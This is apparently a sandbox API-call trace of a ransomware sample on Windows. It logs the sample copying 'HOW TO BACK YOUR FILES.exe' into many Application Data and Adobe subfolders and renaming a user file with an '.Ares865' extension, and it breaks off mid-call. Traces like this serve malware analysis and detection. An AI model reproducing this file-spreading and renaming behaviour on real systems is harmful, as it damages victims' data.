[0109.055] GetLastError () returned 0x0 [0109.055] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities" [0109.055] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1608 | out: hHeap=0x2b0000) returned 1 [0109.055] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0109.055] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities") returned 57 [0109.055] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities" [0109.055] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.055] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\identities\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.056] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.056] GetLastError () returned 0x0 [0109.056] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0109.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0109.056] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0109.056] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned 96 [0109.057] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}" [0109.057] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.057] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\identities\\{31810c36-5d23-4cce-a3b4-316ded195c38}\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.057] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.057] GetLastError () returned 0x0 [0109.058] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe" [0109.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0109.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0109.058] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe") returned 52 [0109.058] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe" [0109.058] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.058] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.059] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.059] GetLastError () returned 0x0 [0109.059] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\LogTransport2", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\LogTransport2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\LogTransport2" [0109.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0109.059] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0109.059] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\LogTransport2") returned 66 [0109.059] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\LogTransport2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\LogTransport2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\LogTransport2" [0109.059] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.059] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\LogTransport2\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\logtransport2\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.060] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.060] GetLastError () returned 0x0 [0109.061] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics" [0109.061] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0109.061] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0109.061] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics") returned 64 [0109.061] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics" [0109.061] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.061] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\linguistics\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.061] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.062] GetLastError () returned 0x0 [0109.063] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics\\Dictionaries", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics\\Dictionaries" [0109.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0109.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0109.063] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics\\Dictionaries") returned 77 [0109.063] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics\\Dictionaries" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics\\Dictionaries") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics\\Dictionaries" [0109.063] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.063] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Linguistics\\Dictionaries\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\linguistics\\dictionaries\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.064] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.064] GetLastError () returned 0x0 [0109.064] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Headlights", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Headlights") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Headlights" [0109.064] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0109.064] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0109.064] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Headlights") returned 63 [0109.064] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Headlights" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Headlights") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Headlights" [0109.064] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.064] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Headlights\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\headlights\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.065] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.065] GetLastError () returned 0x0 [0109.066] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player" [0109.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0109.066] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0109.066] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player") returned 65 [0109.066] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player" [0109.066] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.066] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\flash player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.066] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.067] GetLastError () returned 0x0 [0109.067] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache" [0109.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfda8 | out: hHeap=0x2b0000) returned 1 [0109.067] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0109.067] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache") returned 76 [0109.067] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache" [0109.067] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.067] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\flash player\\assetcache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.068] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.068] GetLastError () returned 0x0 [0109.068] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R" [0109.068] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8890 | out: hHeap=0x2b0000) returned 1 [0109.068] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0109.068] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R") returned 85 [0109.068] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R" [0109.068] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.069] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Flash Player\\AssetCache\\D5NTRC6R\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\flash player\\assetcache\\d5ntrc6r\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.069] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.069] GetLastError () returned 0x0 [0109.070] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat" [0109.070] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0109.070] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0109.070] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat") returned 60 [0109.070] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat" [0109.070] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.070] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.071] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.071] GetLastError () returned 0x0 [0109.071] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0" [0109.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0109.071] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0109.071] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0") returned 65 [0109.071] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0" [0109.071] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.071] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.072] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.072] GetLastError () returned 0x0 [0109.072] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security" [0109.072] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0109.073] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0109.073] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security") returned 74 [0109.073] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security" [0109.073] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0109.073] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0109.074] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0109.074] GetLastError () returned 0x0 [0109.074] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.Ares865") returned 103 [0109.075] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\adobe\\acrobat\\10.0\\security\\addressbook.acrodata.ares865"), dwFlags=0x1) returned 1 [0109.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Adobe\\Acrobat\\10.0\\Security\\addressbook.acrodata.Ares865" (normalized: "c:\\users\\5p5nrgjn0js 